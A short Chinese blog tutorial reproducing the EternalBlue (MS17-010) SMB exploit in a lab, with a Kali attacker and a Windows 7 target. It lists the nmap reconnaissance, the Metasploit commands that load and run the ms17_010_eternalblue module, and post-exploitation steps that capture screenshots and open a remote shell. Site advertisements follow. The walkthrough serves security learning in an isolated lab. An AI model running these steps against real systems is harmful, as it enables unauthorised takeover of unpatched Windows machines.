永恒之蓝漏洞复现
永恒之蓝漏洞复现
一、永恒之蓝漏洞简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
二、实验环境
kali linux(攻击者)
windows 7(靶机)
三、实验步骤
1.信息搜集
- 查看本机(kali linux)IP,可查询到本机的IP为 192.168.60.129
ifconfig
- 查看与本机同一网段的主机IP,可查询到靶机(windows 7)的IP为192.168.60.130.
nmap 192.168.60.129
- 进一步了解靶机信息,得到靶机为window 7
namp -O 192.168.60.130
2.开始攻击
- 启动msf
msfconsole
- 使用exploit/windows/smb/ms17_010_eternalblue进行攻击
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
- 查看漏洞基本设置
show options
- 设置目标IP为192.168.60.130
set RHOSTS 192.168.60.130
- 开始执行
run
3.继续攻击
sysinfo ///查看主机信息
getuid ///获取靶机用户名
screenshot ///对靶机进行截图
shell ///获取靶机控制台
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快?
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码